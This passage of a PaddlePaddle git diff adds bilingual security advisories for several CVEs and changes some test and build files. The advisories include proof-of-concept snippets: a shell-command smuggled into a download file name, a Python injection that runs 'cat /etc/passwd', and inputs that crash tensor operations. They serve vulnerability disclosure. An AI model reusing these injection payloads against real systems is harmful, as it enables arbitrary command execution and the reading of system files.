+我们在commits [1aae481dfd7d2055c801563e254f1484b974b68e](https://github.com/PaddlePaddle/Paddle/pull/60023/commits/1aae481dfd7d2055c801563e254f1484b974b68e)、[c62d87eb91c84154af40946f17205d86f608866b](https://github.com/PaddlePaddle/Paddle/pull/60544/commits/c62d87eb91c84154af40946f17205d86f608866b) 和 [f8560c903c80450e37b8f304a9cd8207678f2f83](https://github.com/PaddlePaddle/Paddle/pull/60615/commits/f8560c903c80450e37b8f304a9cd8207678f2f83) 中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 huntr.com 和 leeya_bug 提交。
diff --git a/security/advisory/pdsa-2023-020.md b/security/advisory/pdsa-2023-020.md
new file mode 100644
index 00000000000000..ed3a5966d6ca60
--- /dev/null
+++ b/security/advisory/pdsa-2023-020.md
@@ -0,0 +1,28 @@
+## PDSA-2023-020: Command injection in _wget_download
+
+### CVE Number
+
+CVE-2023-52311
+
+### Impact
+
+Command injection in `_wget_download` which could lead to execute arbitrary commands. The PoC is as follows:
+
+```python
+from paddle import utils
+
+utils.download._wget_download("aa; touch codexecution", "bb")
+```
+
+### Patches
+
+We have patched the issue in commit [d5550d3f2f5bab48c783b4986ba1cd8e061ce542](https://github.com/PaddlePaddle/Paddle/pull/59957/commits/d5550d3f2f5bab48c783b4986ba1cd8e061ce542).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by huntr.com.
diff --git a/security/advisory/pdsa-2023-020_cn.md b/security/advisory/pdsa-2023-020_cn.md
new file mode 100644
index 00000000000000..a6bd1321592e62
--- /dev/null
+++ b/security/advisory/pdsa-2023-020_cn.md
@@ -0,0 +1,28 @@
+## PDSA-2023-020: Command injection in _wget_download
+
+### CVE编号
+
+CVE-2023-52311
+
+### 影响
+
+`_wget_download`存在命令注入漏洞，可造成任意命令执行，PoC代码如下：
+
+```python
+from paddle import utils
+
+utils.download._wget_download("aa; touch codexecution", "bb")
+```
+
+### 补丁
+
+我们在commit [d5550d3f2f5bab48c783b4986ba1cd8e061ce542](https://github.com/PaddlePaddle/Paddle/pull/59957/commits/d5550d3f2f5bab48c783b4986ba1cd8e061ce542)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 huntr.com 提交。
diff --git a/security/advisory/pdsa-2023-021.md b/security/advisory/pdsa-2023-021.md
new file mode 100644
index 00000000000000..6a8ec45b33e23c
--- /dev/null
+++ b/security/advisory/pdsa-2023-021.md
@@ -0,0 +1,33 @@
+## PDSA-2023-021: Null pointer dereference in paddle.crop
+
+### CVE Number
+
+CVE-2023-52312
+
+### Impact
+
+Null pointer dereference in `paddle.crop` when tensor dims are invalid . The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(0, 10, [2, 2]).astype(np.int32))
+shape = paddle.to_tensor([-1, 0], dtype='int32')
+offsets = paddle.to_tensor([], dtype='int32')
+
+out = paddle.crop(x, shape, offsets)
+```
+
+### Patches
+
+We have patched the issue in commit [c074de6911944d5d30d28cc7ce2c7099f1c87bce](https://github.com/PaddlePaddle/Paddle/pull/59967/commits/c074de6911944d5d30d28cc7ce2c7099f1c87bce).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Peng Zhou (zpbrent) from Shanghai University.
diff --git a/security/advisory/pdsa-2023-021_cn.md b/security/advisory/pdsa-2023-021_cn.md
new file mode 100644
index 00000000000000..eff0b0c2225aac
--- /dev/null
+++ b/security/advisory/pdsa-2023-021_cn.md
@@ -0,0 +1,33 @@
+## PDSA-2023-021: Null pointer dereference in paddle.crop
+
+### CVE编号
+
+CVE-2023-52312
+
+### 影响
+
+输入张量的维度异常时，`paddle.crop`会引发空指针解引用，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+x = paddle.to_tensor(np.random.uniform(0, 10, [2, 2]).astype(np.int32))
+shape = paddle.to_tensor([-1, 0], dtype='int32')
+offsets = paddle.to_tensor([], dtype='int32')
+
+out = paddle.crop(x, shape, offsets)
+```
+
+### 补丁
+
+我们在commit [c074de6911944d5d30d28cc7ce2c7099f1c87bce](https://github.com/PaddlePaddle/Paddle/pull/59967/commits/c074de6911944d5d30d28cc7ce2c7099f1c87bce)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Peng Zhou (zpbrent) from Shanghai University 提交。
diff --git a/security/advisory/pdsa-2023-022.md b/security/advisory/pdsa-2023-022.md
new file mode 100644
index 00000000000000..b5b3b3519c9c0e
--- /dev/null
+++ b/security/advisory/pdsa-2023-022.md
@@ -0,0 +1,30 @@
+## PDSA-2023-022: FPE in paddle.argmin and paddle.argmax
+
+### CVE Number
+
+CVE-2023-52313
+
+### Impact
+
+FPE in `paddle.argmin` and `paddle.argmax` when input `x.numel()` is 0. The PoC is as follows:
+
+```python
+import paddle
+
+data = paddle.to_tensor([], dtype="int32")
+
+paddle.argmax(data, axis=0)
+```
+
+### Patches
+
+We have patched the issue in commit [41eda9080b12e6f1b3a49cdc8439a1b9f1ed6794](https://github.com/PaddlePaddle/Paddle/pull/59976/commits/41eda9080b12e6f1b3a49cdc8439a1b9f1ed6794).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Peng Zhou (zpbrent) from Shanghai University.
diff --git a/security/advisory/pdsa-2023-022_cn.md b/security/advisory/pdsa-2023-022_cn.md
new file mode 100644
index 00000000000000..d7c57f94394955
--- /dev/null
+++ b/security/advisory/pdsa-2023-022_cn.md
@@ -0,0 +1,30 @@
+## PDSA-2023-022: FPE in paddle.argmin and paddle.argmax
+
+### CVE编号
+
+CVE-2023-52313
+
+### 影响
+
+输入`x.numel()`为0时`paddle.argmin`和`paddle.argmax`会引发除0异常，PoC代码如下：
+
+```python
+import paddle
+
+data = paddle.to_tensor([], dtype="int32")
+
+paddle.argmax(data, axis=0)
+```
+
+### 补丁
+
+我们在commit [41eda9080b12e6f1b3a49cdc8439a1b9f1ed6794](https://github.com/PaddlePaddle/Paddle/pull/59976/commits/41eda9080b12e6f1b3a49cdc8439a1b9f1ed6794)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Peng Zhou (zpbrent) from Shanghai University 提交。
diff --git a/security/advisory/pdsa-2023-023.md b/security/advisory/pdsa-2023-023.md
new file mode 100644
index 00000000000000..c2671f7f87adca
--- /dev/null
+++ b/security/advisory/pdsa-2023-023.md
@@ -0,0 +1,28 @@
+## PDSA-2023-023: Command injection in convert_shape_compare
+
+### CVE Number
+
+CVE-2023-52314
+
+### Impact
+
+Command injection in `convert_shape_compare` which could lead to execute arbitrary commands. The PoC is as follows:
+
+```python
+import paddle
+
+paddle.jit.dy2static.convert_operators.convert_shape_compare('prefix','+ str(__import__("os").system("cat /etc/passwd")) +','1')
+```
+
+### Patches
+
+We have patched the issue in commit [c3b6414eb313480f1417abe92d410dfe89723097](https://github.com/PaddlePaddle/Paddle/pull/60097/commits/c3b6414eb313480f1417abe92d410dfe89723097).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by leeya_bug.
diff --git a/security/advisory/pdsa-2023-023_cn.md b/security/advisory/pdsa-2023-023_cn.md
new file mode 100644
index 00000000000000..3de87a4d707674
--- /dev/null
+++ b/security/advisory/pdsa-2023-023_cn.md
@@ -0,0 +1,28 @@
+## PDSA-2023-023: Command injection in convert_shape_compare
+
+### CVE编号
+
+CVE-2023-52314
+
+### 影响
+
+`convert_shape_compare`存在命令注入漏洞，可造成任意命令执行，PoC代码如下：
+
+```python
+import paddle
+
+paddle.jit.dy2static.convert_operators.convert_shape_compare('prefix','+ str(__import__("os").system("cat /etc/passwd")) +','1')
+```
+
+### 补丁
+
+我们在commit [c3b6414eb313480f1417abe92d410dfe89723097](https://github.com/PaddlePaddle/Paddle/pull/60097/commits/c3b6414eb313480f1417abe92d410dfe89723097)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 leeya_bug 提交。
diff --git a/test/auto_parallel/hybrid_strategy/CMakeLists.txt b/test/auto_parallel/hybrid_strategy/CMakeLists.txt
index 8d4c34745d8238..4d15ae4b30d922 100644
--- a/test/auto_parallel/hybrid_strategy/CMakeLists.txt
+++ b/test/auto_parallel/hybrid_strategy/CMakeLists.txt
@@ -10,7 +10,7 @@ if((WITH_GPU) AND (LINUX))
     test_semi_auto_parallel_hybrid_strategy ENVS
     "http_proxy=;https_proxy=;PYTHONPATH=../..:${PADDLE_BINARY_DIR}/python")
   set_tests_properties(test_semi_auto_parallel_hybrid_strategy
-                       PROPERTIES TIMEOUT "180" LABELS "RUN_TYPE=HYBRID")
+                       PROPERTIES TIMEOUT "600" LABELS "RUN_TYPE=HYBRID")
 endif()
 if((WITH_GPU) AND (LINUX))
   py_test_modules(
diff --git a/test/collective/fleet/run_server_for_communicator_half_async.py b/test/collective/fleet/run_server_for_communicator_half_async.py
new file mode 100644
index 00000000000000..14d8fd80331b35
--- /dev/null
+++ b/test/collective/fleet/run_server_for_communicator_half_async.py
@@ -0,0 +1,38 @@
+# Copyright (c) 2023 PaddlePaddle Authors. All Rights Reserved.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import os
+
+from test_communicator_half_async import TestCommunicatorHalfAsyncEnd2End
+
+import paddle
+
+paddle.enable_static()
+
+pipe_name = os.getenv("PIPE_FILE")
+
+
+class RunServer(TestCommunicatorHalfAsyncEnd2End):
+    def runTest(self):
+        pass
+
+
+os.environ["TRAINING_ROLE"] = "PSERVER"
+os.environ["http_proxy"] = ""
+os.environ["https_proxy"] = ""
+half_run_server = RunServer()
+with open(pipe_name, 'w') as pipe:
+    pipe.write('done')
+
+half_run_server.run_ut()
diff --git a/test/collective/fleet/test_communicator_half_async.py b/test/collective/fleet/test_communicator_half_async.py
index 25e5302fb444fd..687337f25ab2ae 100644
--- a/test/collective/fleet/test_communicator_half_async.py
+++ b/test/collective/fleet/test_communicator_half_async.py
@@ -15,6 +15,7 @@
 import os
 import subprocess
 import sys
+import tempfile
 import unittest
 
 import numpy
@@ -23,6 +24,7 @@
 from paddle import base
 from paddle.distributed import fleet
 from paddle.distributed.fleet.base import role_maker
+from paddle.distributed.utils.launch_utils import find_free_ports
 
 paddle.enable_static()
 
@@ -30,25 +32,44 @@
 class TestCommunicatorHalfAsyncEnd2End(unittest.TestCase):
     def net(self):
         x = paddle.static.data(name='x', shape=[-1, 13], dtype='float32')
-        y_predict = paddle.static.nn.fc(x, size=1, activation=None)
-        y = paddle.static.data(name='y', shape=[-1, 1], dtype='float32')
+        x1 = paddle.static.data(
+            name='x1', shape=[-1, 1], dtype='int64', lod_level=1
+        )
 
+        emb = paddle.static.nn.embedding(
+            input=x1,
+            size=[10000, 10],
+            param_attr=base.ParamAttr(
+                name="embedding",
+                initializer=paddle.nn.initializer.Constant(value=0.01),
+            ),
+            is_sparse=True,
+        )
+
+        pool = paddle.static.nn.sequence_lod.sequence_pool(
+            input=emb.squeeze(-2), pool_type="sum"
+        )
+        z = paddle.concat([x, pool], axis=1)
+
+        y_predict = paddle.static.nn.fc(x=z, size=1)
+        y = paddle.static.data(name='y', shape=[-1, 1], dtype='float32')
         cost = paddle.nn.functional.square_error_cost(input=y_predict, label=y)
         avg_cost = paddle.mean(cost)
-        return avg_cost, x, y
+        return avg_cost, x, x1, y
 
     def fake_reader(self):
         def reader():
             for i in range(10000):
                 x = numpy.random.random((1, 13)).astype('float32')
+                z = numpy.random.randint(0, 9999, (1, 1)).astype('int64')
                 y = numpy.random.randint(0, 2, (1, 1)).astype('int64')
-                yield x, y
+                yield x, z, y
 
         return reader
 
     def run_pserver(self, role, strategy):
         fleet.init(role)
-        avg_cost, x, y = self.net()
+        avg_cost, x, z, y = self.net()
         optimizer = paddle.optimizer.SGD(0.01)
         optimizer = fleet.distributed_optimizer(optimizer, strategy)
         optimizer.minimize(avg_cost)
@@ -61,20 +82,20 @@ def run_trainer(self, role, strategy):
         exe = base.Executor(place)
 
         fleet.init(role)
-        avg_cost, x, y = self.net()
+        avg_cost, x, z, y = self.net()
         optimizer = paddle.optimizer.SGD(0.01)
         optimizer = fleet.distributed_optimizer(optimizer, strategy)
         optimizer.minimize(avg_cost)
 
-        exe.run(paddle.static.default_startup_program())
+        exe.run(base.default_startup_program())
         fleet.init_worker()
 
         train_reader = paddle.batch(self.fake_reader(), batch_size=24)
-        feeder = base.DataFeeder(place=place, feed_list=[x, y])
+        feeder = base.DataFeeder(place=place, feed_list=[x, z, y])
 
         for batch_id, data in enumerate(train_reader()):
             exe.run(
-                paddle.static.default_main_program(),
+                base.default_main_program(),
                 feed=feeder.feed(data),
                 fetch_list=[],
             )
@@ -82,19 +103,18 @@ def run_trainer(self, role, strategy):
         fleet.stop_worker()
 
     def run_ut(self):
-        strategy = paddle.distributed.fleet.DistributedStrategy()
-        strategy.a_sync = True
-
         training_role = os.getenv("TRAINING_ROLE", "TRAINER")
 
-        role = role_maker.UserDefinedRoleMaker(
-            current_id=0,
-            role=role_maker.Role.WORKER
-            if training_role == "TRAINER"
-            else role_maker.Role.SERVER,
-            worker_num=1,
-            server_endpoints=["127.0.0.1:6002"],
-        )
+        os.environ["PADDLE_PSERVER_NUMS"] = "1"
+        os.environ["PADDLE_TRAINERS_NUM"] = "1"
+        os.environ["PADDLE_TRAINER_ID"] = "0"
+        os.environ["PADDLE_TRAINERS_NUM"] = "1"
+        os.environ["POD_IP"] = "127.0.0.1"
+
+        role = role_maker.PaddleCloudRoleMaker()
+
+        strategy = paddle.distributed.fleet.DistributedStrategy()
+        strategy.a_sync = True
 
         if training_role == "TRAINER":
             self.run_trainer(role, strategy)
@@ -102,61 +122,39 @@ def run_ut(self):
             self.run_pserver(role, strategy)
 
     def test_communicator(self):
-        run_server_cmd = """
+        temp_dir = tempfile.TemporaryDirectory()
+        pipe_name = os.path.join(temp_dir.name, 'mypipe')
+        try:
+            os.mkfifo(pipe_name)
+        except OSError as oe:
+            print(f"Failed to create pipe: {oe}")
 
-import sys
-import os
+        port = find_free_ports(1).pop()
 
-import time
-import threading
-import subprocess
-import unittest
-import numpy
-
-from test_communicator_half_async import TestCommunicatorHalfAsyncEnd2End
-
-import paddle
-import paddle.base as base
-import paddle.distributed.fleet as fleet
-import paddle.distributed.fleet.base.role_maker as role_maker
-
-paddle.enable_static()
-
-class RunServer(TestCommunicatorHalfAsyncEnd2End):
-    def runTest(self):
-        pass
-
-os.environ["http_proxy"] = ""
-os.environ["https_proxy"] = ""
-os.environ["TRAINING_ROLE"] = "PSERVER"
-half_run_server = RunServer()
-half_run_server.run_ut()
-"""
-
-        server_file = "run_server_for_communicator_haflaysnc.py"
-        with open(server_file, "w") as wb:
-            wb.write(run_server_cmd)
         os.environ["TRAINING_ROLE"] = "PSERVER"
-        _python = sys.executable
+        os.environ["PADDLE_PORT"] = str(port)
+        os.environ["PADDLE_PSERVERS_IP_PORT_LIST"] = f"127.0.0.1:{port}"
+        os.environ["PIPE_FILE"] = pipe_name
 
+        _python = sys.executable
+        server_file = "run_server_for_communicator_half_async.py"
         ps_cmd = f"{_python} {server_file}"
+
         ps_proc = subprocess.Popen(
             ps_cmd.strip().split(" "),
             stdout=subprocess.PIPE,
             stderr=subprocess.PIPE,
         )
 
-        os.environ["http_proxy"] = ""
-        os.environ["https_proxy"] = ""
+        with open(pipe_name, 'r') as pipe:
+            start_command = pipe.read()
+
         os.environ["TRAINING_ROLE"] = "TRAINER"
-        os.environ["FLAGS_communicator_send_queue_size"] = "1"
-        os.environ["FLAGS_communicator_max_merge_var_num"] = "1"
 
         self.run_ut()
         ps_proc.kill()
-
-        if os.path.exists(server_file):
-            os.remove(server_file)
+        ps_proc.wait()
+        outs, errs = ps_proc.communicate()
 
 
 if __name__ == '__main__':
diff --git a/test/cpp/fluid/CMakeLists.txt b/test/cpp/fluid/CMakeLists.txt
index 59ed51f7681685..e811e547511a84 100644
--- a/test/cpp/fluid/CMakeLists.txt
+++ b/test/cpp/fluid/CMakeLists.txt
@@ -1,8 +1,6 @@
 add_subdirectory(benchmark)
 add_subdirectory(framework)
 
-add_subdirectory(inference)
-
 if(WITH_CINN)
   add_subdirectory(cinn)
 endif()
diff --git a/test/cpp/fluid/inference/CMakeLists.txt b/test/cpp/fluid/inference/CMakeLists.txt
deleted file mode 100644
index 512d2b1553c8c9..00000000000000
--- a/test/cpp/fluid/inference/CMakeLists.txt
+++ /dev/null
@@ -1 +0,0 @@
-add_subdirectory(utils)
diff --git a/test/cpp/fluid/inference/utils/CMakeLists.txt b/test/cpp/fluid/inference/utils/CMakeLists.txt
deleted file mode 100644
index 3ea72839b19243..00000000000000
--- a/test/cpp/fluid/inference/utils/CMakeLists.txt
+++ /dev/null
@@ -1,16 +0,0 @@
-if(WITH_TESTING)
-    if(NOT APPLE)
-      inference_base_test(
-            infer_io_utils_tester SRCS io_utils_tester.cc 
-            DEPS
-            paddle_inference_shared
-            common
-      )
-      endif()
-endif()
-
-if(WITH_ONNXRUNTIME AND WIN32)
-    # Copy onnxruntime for some c++ test in Windows, since the test will
-    # be build only in CI, so suppose the generator in Windows is Ninja.
-    copy_onnx(infer_io_utils_tester)
-endif()
diff --git a/test/cpp/fluid/inference/utils/io_utils_tester.cc b/test/cpp/fluid/inference/utils/io_utils_tester.cc
deleted file mode 100644
index 756027fb6cb9bd..00000000000000
--- a/test/cpp/fluid/inference/utils/io_utils_tester.cc
+++ /dev/null
@@ -1,154 +0,0 @@
-// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-//     http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-
-#include <glog/logging.h>
-#include <gtest/gtest.h>
-
-#include <utility>
-
-#include "paddle/fluid/inference/api/helper.h"
-#include "paddle/fluid/inference/utils/io_utils.h"
-
-namespace paddle {
-namespace inference {
-namespace {
-
-bool pd_tensor_equal(const paddle::PaddleTensor& ref,
-                     const paddle::PaddleTensor& t) {
-  bool is_equal = true;
-  VLOG(3) << "ref.name: " << ref.name << ", t.name: " << t.name;
-  VLOG(3) << "ref.dtype: " << ref.dtype << ", t.dtype: " << t.dtype;
-  VLOG(3) << "ref.lod_level: " << ref.lod.size()
-          << ", t.dtype: " << t.lod.size();
-  VLOG(3) << "ref.data_len: " << ref.data.length()
-          << ", t.data_len: " << t.data.length();
-  return is_equal && (ref.name == t.name) && (ref.lod == t.lod) &&
-         (ref.dtype == t.dtype) &&
-         (std::memcmp(ref.data.data(), t.data.data(), ref.data.length()) == 0);
-}
-
-template <typename T>
-void test_io_utils() {
-  std::vector<T> input({6, 8});
-  paddle::PaddleTensor in;
-  in.name = "Hello";
-  in.shape = {1, 2};
-  in.lod = std::vector<std::vector<size_t>>{{0, 1}};
-  in.data = paddle::PaddleBuf(static_cast<void*>(input.data()),
-                              input.size() * sizeof(T));
-  in.dtype = paddle::inference::PaddleTensorGetDType<T>();
-  std::stringstream ss;
-  paddle::inference::SerializePDTensorToStream(&ss, in);
-  paddle::PaddleTensor out;
-  paddle::inference::DeserializePDTensorToStream(ss, &out);
-  ASSERT_TRUE(pd_tensor_equal(in, out));
-}
-}  // namespace
-}  // namespace inference
-}  // namespace paddle
-
-TEST(infer_io_utils, float32) { paddle::inference::test_io_utils<float>(); }
-
-TEST(infer_io_utils, tensors) {
-  // Create a float32 tensor.
-  std::vector<float> input_fp32({1.1f, 3.2f, 5.0f, 8.2f});
-  paddle::PaddleTensor in_fp32;
-  in_fp32.name = "Tensor.fp32_0";
-  in_fp32.shape = {2, 2};
-  in_fp32.data = paddle::PaddleBuf(static_cast<void*>(input_fp32.data()),
-                                   input_fp32.size() * sizeof(float));
-  in_fp32.dtype = paddle::inference::PaddleTensorGetDType<float>();
-
-  // Create a int64 tensor.
-  std::vector<float> input_int64({5, 8});
-  paddle::PaddleTensor in_int64;
-  in_int64.name = "Tensor.int64_0";
-  in_int64.shape = {1, 2};
-  in_int64.lod = std::vector<std::vector<size_t>>{{0, 1}};
-  in_int64.data = paddle::PaddleBuf(static_cast<void*>(input_int64.data()),
-                                    input_int64.size() * sizeof(int64_t));
-  in_int64.dtype = paddle::inference::PaddleTensorGetDType<int64_t>();
-
-  // Serialize tensors.
-  std::vector<paddle::PaddleTensor> tensors_in({in_fp32});
-  std::string file_path = "./io_utils_tensors";
-  paddle::inference::SerializePDTensorsToFile(file_path, tensors_in);
-
-  // Deserialize tensors.
-  std::vector<paddle::PaddleTensor> tensors_out;
-  paddle::inference::DeserializePDTensorsToFile(file_path, &tensors_out);
-
-  // Check results.
-  ASSERT_EQ(tensors_in.size(), tensors_out.size());
-  for (size_t i = 0; i < tensors_in.size(); ++i) {
-    ASSERT_TRUE(
-        paddle::inference::pd_tensor_equal(tensors_in[i], tensors_out[i]));
-  }
-}
-
-TEST(shape_info_io, read_and_write) {
-  const std::string path = "test_shape_info_io";
-  std::map<std::string, std::vector<int32_t>> min_shape, max_shape, opt_shape;
-  std::map<std::string, std::vector<int32_t>> min_value, max_value, opt_value;
-  min_shape.insert(
-      std::make_pair("test1", std::vector<int32_t>{1, 3, 112, 112}));
-  max_shape.insert(
-      std::make_pair("test1", std::vector<int32_t>{1, 3, 224, 224}));
-  opt_shape.insert(
-      std::make_pair("test1", std::vector<int32_t>{1, 3, 224, 224}));
-  min_value.insert(
-      std::make_pair("test1", std::vector<int32_t>{1, 3, 112, 112}));
-  max_value.insert(
-      std::make_pair("test1", std::vector<int32_t>{1, 3, 224, 224}));
-  opt_value.insert(
-      std::make_pair("test1", std::vector<int32_t>{1, 3, 224, 224}));
-  paddle::inference::SerializeShapeRangeInfo(
-      path, min_shape, max_shape, opt_shape, min_value, max_value, opt_value);
-  min_shape.clear();
-  max_shape.clear();
-  opt_shape.clear();
-  min_value.clear();
-  max_value.clear();
-  opt_value.clear();
-  opt_shape.insert(
-      std::make_pair("test2", std::vector<int32_t>{1, 3, 224, 224}));
-  paddle::inference::DeserializeShapeRangeInfo(path,
-                                               &min_shape,
-                                               &max_shape,
-                                               &opt_shape,
-                                               &min_value,
-                                               &max_value,
-                                               &opt_value);
-
-  min_shape.insert(std::make_pair("test1", std::vector<int32_t>{1, 3, 56, 56}));
-  std::vector<std::string> names{"test1"};
-  paddle::inference::UpdateShapeRangeInfo(path,
-                                          min_shape,
-                                          max_shape,
-                                          opt_shape,
-                                          min_value,
-                                          max_value,
-                                          opt_value,
-                                          names,
-                                          names);
-
-  ASSERT_THROW(paddle::inference::DeserializeShapeRangeInfo("no_exists_file",
-                                                            &min_shape,
-                                                            &max_shape,
-                                                            &opt_shape,
-                                                            &min_value,
-                                                            &max_value,
-                                                            &opt_value);
-               , paddle::platform::EnforceNotMet);
-}
diff --git a/test/cpp/inference/api/tester_helper.h b/test/cpp/inference/api/tester_helper.h
index a410df859fe450..a5d60ca6eec974 100644
--- a/test/cpp/inference/api/tester_helper.h
+++ b/test/cpp/inference/api/tester_helper.h
@@ -34,7 +34,6 @@
 #include "paddle/fluid/inference/api/analysis_predictor.h"
 #include "paddle/fluid/inference/api/helper.h"
 #include "paddle/fluid/inference/api/paddle_inference_api.h"
-#include "paddle/fluid/inference/utils/benchmark.h"
 #include "paddle/fluid/platform/profiler/event_tracing.h"
 #include "test/cpp/inference/api/config_printer.h"
 #include "test/cpp/inference/test_helper.h"
@@ -69,9 +68,6 @@ PD_DEFINE_int32(num_threads,
 PD_DEFINE_bool(use_analysis,
                true,
                "Running the inference program in analysis mode.");
-PD_DEFINE_bool(record_benchmark,
-               false,
-               "Record benchmark after profiling the model");
 PD_DEFINE_double(accuracy, 1e-3, "Result Accuracy.");
 PD_DEFINE_double(quantized_accuracy, 2e-2, "Result Quantized Accuracy.");
 PD_DEFINE_bool(zero_copy, false, "Use ZeroCopy to speedup Feed/Fetch.");
@@ -594,14 +590,6 @@ void PredictionRun(PaddlePredictor *predictor,
 
   if (sample_latency != nullptr)
     *sample_latency = batch_latency / FLAGS_batch_size;
-
-  if (FLAGS_record_benchmark) {
-    Benchmark benchmark;
-    benchmark.SetName(FLAGS_model_name);
-    benchmark.SetBatchSize(FLAGS_batch_size);
-    benchmark.SetLatency(batch_latency);
-    benchmark.PersistToFile("benchmark_record.txt");
-  }
 }
 
 void TestOneThreadPrediction(
diff --git a/test/cpp/inference/api/trt_dynamic_shape_test.cc b/test/cpp/inference/api/trt_dynamic_shape_test.cc
index 80929f10447b83..52336e7e8a5412 100644
--- a/test/cpp/inference/api/trt_dynamic_shape_test.cc
+++ b/test/cpp/inference/api/trt_dynamic_shape_test.cc
@@ -191,6 +191,7 @@ void TestTunedDynamic() {
     output_t->copy_to_cpu(out_data.data());
   };
   check_func(predictor_tuned.get());
+  predictor_tuned.reset(nullptr);
 
   // check tuned_dynamic_shape
   AnalysisConfig config;
diff --git a/test/cpp/inference/test.cmake b/test/cpp/inference/test.cmake
index 33961a949369c5..7d3fb889e0e727 100644
--- a/test/cpp/inference/test.cmake
+++ b/test/cpp/inference/test.cmake
@@ -111,10 +111,9 @@ function(inference_base_test_build TARGET)
   add_executable(${TARGET} ${base_test_SRCS})
   if("${base_test_DEPS};" MATCHES "paddle_inference_shared;")
     list(REMOVE_ITEM base_test_DEPS paddle_inference_shared)
-    target_link_libraries(
-      ${TARGET} $<TARGET_LINKER_FILE:paddle_inference_shared>
-      $<TARGET_LINKER_FILE:benchmark>)
-    add_dependencies(${TARGET} paddle_inference_shared benchmark)
+    target_link_libraries(${TARGET}
+                          $<TARGET_LINKER_FILE:paddle_inference_shared>)
+    add_dependencies(${TARGET} paddle_inference_shared)
   elseif("${base_test_DEPS};" MATCHES "paddle_inference_c_shared;")
     list(REMOVE_ITEM base_test_DEPS paddle_inference_c_shared)
     target_link_libraries(${TARGET}
diff --git a/test/custom_runtime/CMakeLists.txt b/test/custom_runtime/CMakeLists.txt
index e8b14445278be8..cf11b5555c3860 100644
--- a/test/custom_runtime/CMakeLists.txt
+++ b/test/custom_runtime/CMakeLists.txt
@@ -1,6 +1,6 @@
 if(WITH_CUSTOM_DEVICE AND NOT WITH_GPU)
   set(PLUGIN_URL https://github.com/PaddlePaddle/PaddleCustomDevice.git)
-  set(PLUGIN_TAG develop)
+  set(PLUGIN_TAG release/2.6)
 
   file(
     GLOB TEST_OPS
diff --git a/test/custom_runtime/test_collective_process_group_xccl.py b/test/custom_runtime/test_collective_process_group_xccl.py
index 3c04a59ebfa742..83690a8ac11348 100644
--- a/test/custom_runtime/test_collective_process_group_xccl.py
+++ b/test/custom_runtime/test_collective_process_group_xccl.py
@@ -150,7 +150,7 @@ def setUp(self):
         cur_dir = os.path.dirname(os.path.abspath(__file__))
         self.temp_dir = tempfile.TemporaryDirectory()
         cmd = 'cd {} \
-            && git clone --depth 1 {} \
+            && git clone --depth 1 {} -b {} \
             && cd PaddleCustomDevice \
             && git fetch origin \
             && git checkout {} -b dev \
@@ -159,6 +159,7 @@ def setUp(self):
             self.temp_dir.name,
             os.getenv('PLUGIN_URL'),
             os.getenv('PLUGIN_TAG'),
+            os.getenv('PLUGIN_TAG'),
             sys.executable,
         )
         os.system(cmd)
diff --git a/test/custom_runtime/test_custom_cpu_plugin.py b/test/custom_runtime/test_custom_cpu_plugin.py
index b92df8def9dd30..5478b7ecfad64c 100755
--- a/test/custom_runtime/test_custom_cpu_plugin.py
+++ b/test/custom_runtime/test_custom_cpu_plugin.py
@@ -26,7 +26,7 @@ def setUp(self):
         cur_dir = os.path.dirname(os.path.abspath(__file__))
         self.temp_dir = tempfile.TemporaryDirectory()
         cmd = 'cd {} \
-            && git clone --depth 1 {} \
+            && git clone --depth 1 {} -b {} \
             && cd PaddleCustomDevice \
             && git fetch origin \
             && git checkout {} -b dev \
@@ -35,6 +35,7 @@ def setUp(self):
             self.temp_dir.name,
             os.getenv('PLUGIN_URL'),
